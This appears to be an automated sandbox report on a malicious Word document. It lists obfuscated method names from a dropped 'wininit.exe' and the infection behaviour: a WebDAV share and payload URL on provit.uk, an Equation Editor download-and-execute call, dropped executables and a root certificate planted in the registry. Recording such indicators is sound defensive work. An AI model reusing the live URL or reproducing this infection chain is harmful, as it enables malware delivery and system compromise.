                Source: 16.2.wininit.exe.4e00000.6.raw.unpack, eWbKPQURAh7q0dXmWQa.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'g6Ics1b5Q4', 'lHScanO8Hq', 'nGHc7Kj1b4', 'Nkvc4EEFTo', 'W1ncOKfXll', 'RBGc1YrhiV', 'W60cEbFZA3'
                Source: 16.2.wininit.exe.4e00000.6.raw.unpack, blpmsJDcqDTfApNEE9.csHigh entropy of concatenated method names: 'sXHIWBvUB1', 'gM3IXliyxi', 'LAkjRqtjrT', 'irsjUBXqk4', 'suWIscc6eO', 'adBIa4DbBY', 'bhgI7Ap3yt', 'JJPI44IQ2E', 'x1FIOfmaQo', 'J1LI18bvGD'
                Source: 16.2.wininit.exe.4e00000.6.raw.unpack, asC2VyhwMrPC2xZIhl.csHigh entropy of concatenated method names: 'ARKCb4vRER', 'PfqC3SbNpI', 'gFNCFAwu0h', 'N7QChL3WU5', 'egwCMgpiYw', 'gXBCZhOmb9', 'HiyCI68I54', 'NnfCj0kphm', 'uQfCdb2Dm9', 'VKQCcjYmRN'
                Source: 16.2.wininit.exe.4e00000.6.raw.unpack, rXxk4UXv0hG6nJr2r4.csHigh entropy of concatenated method names: 'NY8cCHPCTo', 'v1YcGMuL0j', 'PlDcQ98GnS', 'gHrci7Rn0Y', 'LTtcdZa6tk', 'WgxcnQGGAx', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 16.2.wininit.exe.4e00000.6.raw.unpack, wtca6eCuhSEXbwj87j.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'NPhBk6IATb', 'NUrBXV5rDr', 'w4vBzP3VTO', 'Fum8R26vkD', 'BSQ8UGxs3m', 'FAr8ByJM0s', 'KyD88tXy3T', 'HwpHMYNZUsK33x2B4cE'
                Source: 16.2.wininit.exe.4e00000.6.raw.unpack, Y1v65cTfYUkeaqQPAC.csHigh entropy of concatenated method names: 'Dispose', 'xaYUki41xL', 'hXyBuxl6Ko', 'sWJJotluKH', 'NwmUXu8WJh', 'n33Uzq0LEr', 'ProcessDialogKey', 'eg6BR76f1h', 'lmIBU3Lkqh', 'k4kBBdXxk4'
                Source: 16.2.wininit.exe.4e00000.6.raw.unpack, Urg7ubUUcCev0u1dT4r.csHigh entropy of concatenated method names: 'x1jcXgXCGN', 'fvScz1QqAG', 'XKdfRDMKeD', 'LkffUlITX0', 'gnrfBIBAS5', 'AUdf8iyEhN', 'OqwfeZeTlt', 'XAwfvt7blr', 'PnmfKyehow', 'jKVfTiMyVU'
                Source: 16.2.wininit.exe.4e00000.6.raw.unpack, e7gKPApuQs0EWyVG9T.csHigh entropy of concatenated method names: 'YtHQ1avdnI', 'sCKQEBr9Vg', 'RWkQYVTVi9', 'ToString', 'plbQDysEAl', 'QkLQSVFMsJ', 'tyg4QgZnFbC608q3Vvw', 'upiOboZCPTUWbVTJlXN', 'Gr55C2Z22jsqV8xooje'
                Source: 16.2.wininit.exe.4e00000.6.raw.unpack, ywjJDxuXXl5HvcWFju.csHigh entropy of concatenated method names: 'jd1XQnZrwVnLTEDCpNd', 'KywlMNZsQBmADPfNGNl', 'EO5xIiZj2NflMbVFU0Z', 'bmHQjhGy3F', 'nonQdcl1E2', 'QAuQcAH5On', 'J0YoVWZ0gtheKhdG88p', 'Cx56OgZEqBuvdXaLqeJ', 'i4yDHfZGP0q4hERawKj'
                Source: 16.2.wininit.exe.4e00000.6.raw.unpack, BE5k0LFu5KnoWIB8ne.csHigh entropy of concatenated method names: 'QPjT47v345', 'bMaTO5YD1n', 'qL4T1ROcj5', 'B15TEN4D6d', 'noKTY6WZW0', 'KIATDaS7hq', 'wqZTSXrG3c', 'UUKTWm9AvU', 'JPFTkkWlg3', 'zCGTXs1q8C'
                Source: 16.2.wininit.exe.4e00000.6.raw.unpack, hlfKZ6407CBnHJSie5.csHigh entropy of concatenated method names: 'Q4eMPdDINF', 'dABMaa0v9G', 'm1iM46hmGb', 'F35MOwisjH', 'gV1MuYpY1I', 'NEEM9yiVrf', 'T49MmVVXB8', 'vepMttiwtX', 'mSgMp2U8YB', 'OrnM5Qgsgs'
                Source: 16.2.wininit.exe.4e00000.6.raw.unpack, mO72Zbe7qFQORHthPZ.csHigh entropy of concatenated method names: 'IGyUiE5k0L', 'H5KUnnoWIB', 'BwMUVrPC2x', 'pIhUqlJdZP', 'PPIUMX2ehK', 'HKbUZqZASI', 'DrLniM6qODKrhYmosh', 'nIUaEjW6YOpveRetEf', 'lhUUUXaivS', 'm33U8VTlfn'
                Source: 16.2.wininit.exe.4e00000.6.raw.unpack, BwnBSkUenCTHkiiG70o.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't9EwdUeNcg', 'GcswcCxhlR', 'javwf2GxHL', 'M0CwwEMwtd', 'Q2vw2fUeVe', 'b1uwLEqNHF', 'ty2w6esgdc'
                Source: 16.2.wininit.exe.4e00000.6.raw.unpack, kvk9jqBMEXOK4a7rYr.csHigh entropy of concatenated method names: 'UuhxF135Y', 'XnebOGXXx', 'gxo3kDLoB', 'IZJ0qtrjN', 'ArxhXNkJK', 'HajJcBQ7r', 'n91mUTemEhJ9mZBp51', 'RNVkhEo862ysWOUwJ8', 'K5EjtOTxM', 'YgrcQvyG5'
                Source: 16.2.wininit.exe.4e00000.6.raw.unpack, iWse1KSS7gaYi41xLP.csHigh entropy of concatenated method names: 'K0RdMuvAqt', 'BmMdIEKRT2', 'RJfddnVaQa', 'fcWdf4WTkd', 'FJpd2JdMAg', 'XKNd6ZbKD7', 'Dispose', 'S0pjKughCJ', 'Jr6jTQ28or', 'sGujCe3UVH'
                Source: 16.2.wininit.exe.4e00000.6.raw.unpack, eqDwEc5eNbqOMrRccw.csHigh entropy of concatenated method names: 'wsUiKpO8LJ', 'mKeiCuOl5m', 'c76iQWyI7L', 'dG5QXo2Ph5', 's31QzmMPm6', 'tdCiRDR4Xc', 'uVniU0FJwJ', 'vCpiBNnNh2', 'C33i8WyDuh', 'C2FienmEHx'
                Source: 16.2.wininit.exe.4e00000.6.raw.unpack, lBiWxolWI4mIKrpo6Q.csHigh entropy of concatenated method names: 'c6sigqBTbc', 'bA5iHPDRJZ', 'nVIix7HMEI', 'lu8ibUgJBG', 'xQBiyYxTKA', 'Uu3i30xC8r', 'tkNi0FhmID', 'g94iF3DidF', 'LljihX3H7C', 'EeQiJ9voDB'
                Source: 16.2.wininit.exe.4e00000.6.raw.unpack, eenOKjUBoGmHCNGsevJ.csHigh entropy of concatenated method names: 'ToString', 'dynfFoMNSH', 'NPbfhRtonL', 'EsyfJMHbTy', 'SVXfNgrEu2', 'gXWfupVDI1', 'SHPf95laLM', 'jw8fm0999e', 'fKvmhvcqCxomhRmxrhd', 'yiGgBXc63lwjv54kfh4'
                Source: 16.2.wininit.exe.4e00000.6.raw.unpack, urCQEP7xb0Mxs3L7dv.csHigh entropy of concatenated method names: 'RvKAFRNiNm', 'LurAhHQlM9', 'T4WANS9Td2', 'zsCAu6BpFD', 'rgOAmBGW2g', 'rqsAtd3WxD', 'soHA5yy9T5', 'ydbAoD9Y2p', 'hKxAPfH77o', 'nuVAs99LcQ'
                Source: 16.2.wininit.exe.4e00000.6.raw.unpack, x76f1hkrmI3Lkqhn4k.csHigh entropy of concatenated method names: 'E0fdNAeGf6', 'b0Idu8bJEp', 'twmd91E48s', 'oKldmWYHus', 'MhbdtHQOm8', 'RPXdp8Pfdb', 'ArPd5HbWfX', 'Uw5doQYgDG', 'QX0dlENjSW', 'cr1dPT1aQr'
                Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, KQkH3in3AYxtB1JkcI.csHigh entropy of concatenated method names: 'gwb8vauN76', 'coJ8KZpJSC', 'fZs8T6XHIb', 'uqG8CFeqcY', 'Xrh8GBbB4F', 'F5A8QvMX8N', 'Mhg8iMMyDK', 'IwJ8nhpBnt', 'ppo8rHM5l3', 'zKB8VcEgFn'
                Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, BDLA7ZzmjyZeMHspbI.csHigh entropy of concatenated method names: 'pYcc3qb4LP', 'iVMcFnRmTf', 'kjSch2OmFh', 'dPKcNtftA0', 'ep5cukejfW', 'DLtcmCOIuX', 'lWKctS9MXy', 'aH8c6uleZm', 'Py5cgNOThj', 'aoVcHMdwZP'
                Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, dhK9KbNqZASI81hGMI.csHigh entropy of concatenated method names: 'sfGQv3qveH', 'Gk1QTJCxla', 'PF0QGPZ0c9', 'ecJQiiiaj1', 'k6KQn6iR71', 'XSqGYjTQNd', 'dr0GDj07xW', 'z70GSox8Zc', 'UUbGWZII6b', 'n2XGkeHKAq'
                Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, eWbKPQURAh7q0dXmWQa.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'g6Ics1b5Q4', 'lHScanO8Hq', 'nGHc7Kj1b4', 'Nkvc4EEFTo', 'W1ncOKfXll', 'RBGc1YrhiV', 'W60cEbFZA3'
                Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, blpmsJDcqDTfApNEE9.csHigh entropy of concatenated method names: 'sXHIWBvUB1', 'gM3IXliyxi', 'LAkjRqtjrT', 'irsjUBXqk4', 'suWIscc6eO', 'adBIa4DbBY', 'bhgI7Ap3yt', 'JJPI44IQ2E', 'x1FIOfmaQo', 'J1LI18bvGD'
                Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, asC2VyhwMrPC2xZIhl.csHigh entropy of concatenated method names: 'ARKCb4vRER', 'PfqC3SbNpI', 'gFNCFAwu0h', 'N7QChL3WU5', 'egwCMgpiYw', 'gXBCZhOmb9', 'HiyCI68I54', 'NnfCj0kphm', 'uQfCdb2Dm9', 'VKQCcjYmRN'
                Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, rXxk4UXv0hG6nJr2r4.csHigh entropy of concatenated method names: 'NY8cCHPCTo', 'v1YcGMuL0j', 'PlDcQ98GnS', 'gHrci7Rn0Y', 'LTtcdZa6tk', 'WgxcnQGGAx', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, wtca6eCuhSEXbwj87j.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'NPhBk6IATb', 'NUrBXV5rDr', 'w4vBzP3VTO', 'Fum8R26vkD', 'BSQ8UGxs3m', 'FAr8ByJM0s', 'KyD88tXy3T', 'HwpHMYNZUsK33x2B4cE'
                Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, Y1v65cTfYUkeaqQPAC.csHigh entropy of concatenated method names: 'Dispose', 'xaYUki41xL', 'hXyBuxl6Ko', 'sWJJotluKH', 'NwmUXu8WJh', 'n33Uzq0LEr', 'ProcessDialogKey', 'eg6BR76f1h', 'lmIBU3Lkqh', 'k4kBBdXxk4'
                Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, Urg7ubUUcCev0u1dT4r.csHigh entropy of concatenated method names: 'x1jcXgXCGN', 'fvScz1QqAG', 'XKdfRDMKeD', 'LkffUlITX0', 'gnrfBIBAS5', 'AUdf8iyEhN', 'OqwfeZeTlt', 'XAwfvt7blr', 'PnmfKyehow', 'jKVfTiMyVU'
                Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, e7gKPApuQs0EWyVG9T.csHigh entropy of concatenated method names: 'YtHQ1avdnI', 'sCKQEBr9Vg', 'RWkQYVTVi9', 'ToString', 'plbQDysEAl', 'QkLQSVFMsJ', 'tyg4QgZnFbC608q3Vvw', 'upiOboZCPTUWbVTJlXN', 'Gr55C2Z22jsqV8xooje'
                Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, ywjJDxuXXl5HvcWFju.csHigh entropy of concatenated method names: 'jd1XQnZrwVnLTEDCpNd', 'KywlMNZsQBmADPfNGNl', 'EO5xIiZj2NflMbVFU0Z', 'bmHQjhGy3F', 'nonQdcl1E2', 'QAuQcAH5On', 'J0YoVWZ0gtheKhdG88p', 'Cx56OgZEqBuvdXaLqeJ', 'i4yDHfZGP0q4hERawKj'
                Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, BE5k0LFu5KnoWIB8ne.csHigh entropy of concatenated method names: 'QPjT47v345', 'bMaTO5YD1n', 'qL4T1ROcj5', 'B15TEN4D6d', 'noKTY6WZW0', 'KIATDaS7hq', 'wqZTSXrG3c', 'UUKTWm9AvU', 'JPFTkkWlg3', 'zCGTXs1q8C'
                Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, hlfKZ6407CBnHJSie5.csHigh entropy of concatenated method names: 'Q4eMPdDINF', 'dABMaa0v9G', 'm1iM46hmGb', 'F35MOwisjH', 'gV1MuYpY1I', 'NEEM9yiVrf', 'T49MmVVXB8', 'vepMttiwtX', 'mSgMp2U8YB', 'OrnM5Qgsgs'
                Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, mO72Zbe7qFQORHthPZ.csHigh entropy of concatenated method names: 'IGyUiE5k0L', 'H5KUnnoWIB', 'BwMUVrPC2x', 'pIhUqlJdZP', 'PPIUMX2ehK', 'HKbUZqZASI', 'DrLniM6qODKrhYmosh', 'nIUaEjW6YOpveRetEf', 'lhUUUXaivS', 'm33U8VTlfn'
                Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, BwnBSkUenCTHkiiG70o.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't9EwdUeNcg', 'GcswcCxhlR', 'javwf2GxHL', 'M0CwwEMwtd', 'Q2vw2fUeVe', 'b1uwLEqNHF', 'ty2w6esgdc'
                Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, kvk9jqBMEXOK4a7rYr.csHigh entropy of concatenated method names: 'UuhxF135Y', 'XnebOGXXx', 'gxo3kDLoB', 'IZJ0qtrjN', 'ArxhXNkJK', 'HajJcBQ7r', 'n91mUTemEhJ9mZBp51', 'RNVkhEo862ysWOUwJ8', 'K5EjtOTxM', 'YgrcQvyG5'
                Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, iWse1KSS7gaYi41xLP.csHigh entropy of concatenated method names: 'K0RdMuvAqt', 'BmMdIEKRT2', 'RJfddnVaQa', 'fcWdf4WTkd', 'FJpd2JdMAg', 'XKNd6ZbKD7', 'Dispose', 'S0pjKughCJ', 'Jr6jTQ28or', 'sGujCe3UVH'
                Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, eqDwEc5eNbqOMrRccw.csHigh entropy of concatenated method names: 'wsUiKpO8LJ', 'mKeiCuOl5m', 'c76iQWyI7L', 'dG5QXo2Ph5', 's31QzmMPm6', 'tdCiRDR4Xc', 'uVniU0FJwJ', 'vCpiBNnNh2', 'C33i8WyDuh', 'C2FienmEHx'
                Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, lBiWxolWI4mIKrpo6Q.csHigh entropy of concatenated method names: 'c6sigqBTbc', 'bA5iHPDRJZ', 'nVIix7HMEI', 'lu8ibUgJBG', 'xQBiyYxTKA', 'Uu3i30xC8r', 'tkNi0FhmID', 'g94iF3DidF', 'LljihX3H7C', 'EeQiJ9voDB'
                Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, eenOKjUBoGmHCNGsevJ.csHigh entropy of concatenated method names: 'ToString', 'dynfFoMNSH', 'NPbfhRtonL', 'EsyfJMHbTy', 'SVXfNgrEu2', 'gXWfupVDI1', 'SHPf95laLM', 'jw8fm0999e', 'fKvmhvcqCxomhRmxrhd', 'yiGgBXc63lwjv54kfh4'
                Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, urCQEP7xb0Mxs3L7dv.csHigh entropy of concatenated method names: 'RvKAFRNiNm', 'LurAhHQlM9', 'T4WANS9Td2', 'zsCAu6BpFD', 'rgOAmBGW2g', 'rqsAtd3WxD', 'soHA5yy9T5', 'ydbAoD9Y2p', 'hKxAPfH77o', 'nuVAs99LcQ'
                Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, x76f1hkrmI3Lkqhn4k.csHigh entropy of concatenated method names: 'E0fdNAeGf6', 'b0Idu8bJEp', 'twmd91E48s', 'oKldmWYHus', 'MhbdtHQOm8', 'RPXdp8Pfdb', 'ArPd5HbWfX', 'Uw5doQYgDG', 'QX0dlENjSW', 'cr1dPT1aQr'

                Persistence and Installation Behavior

                barindex
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\provit.uk@SSL\DavWWWRootJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\provit.uk@SSL\DavWWWRootJump to behavior
                Source: settings.xml.relsExtracted files from sample: https://provit.uk/ib9yle?&shoelace=strong&skyscraper=discreet&roll=thoughtful&mimosa=wacky&vulture
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\wininit.exeJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns[1].doc.0.drJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: 18F2865F.doc.0.drJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_035F0499 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,8_2_035F0499
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\caspol[1].exeJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\wininit.exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.dllJump to dropped file
                Source: C:\Users\user\AppData\Roaming\wininit.exeFile created: C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)Jump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
